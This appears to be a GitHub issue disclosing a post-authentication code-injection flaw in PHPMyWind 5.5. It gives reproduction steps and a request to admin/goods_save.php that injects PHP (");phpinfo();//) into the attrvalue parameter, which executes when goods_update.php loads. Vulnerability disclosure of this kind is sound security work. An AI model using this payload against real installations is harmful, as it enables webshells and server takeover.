-
Notifications
You must be signed in to change notification settings - Fork 0
Open
Description
Attackers can get webshell or code execution
1.First download the phpmywind the Latest version from http://phpmywind.com/downloads/PHPMyWind_5.5.zip
2.install it
3.login as Admin
4.request http://localhost/admin/goods_save.php?action=add&attrid[]=1&attrvalue[]=2");phpinfo();//
5.then request http://localhost/admin/goods_update.php?id=2
In summary: from admin/goods_save.php Insert data into database and then from admin/goods_update.php enter the String2Array function and code execution :)
Metadata
Metadata
Assignees
Labels
No labels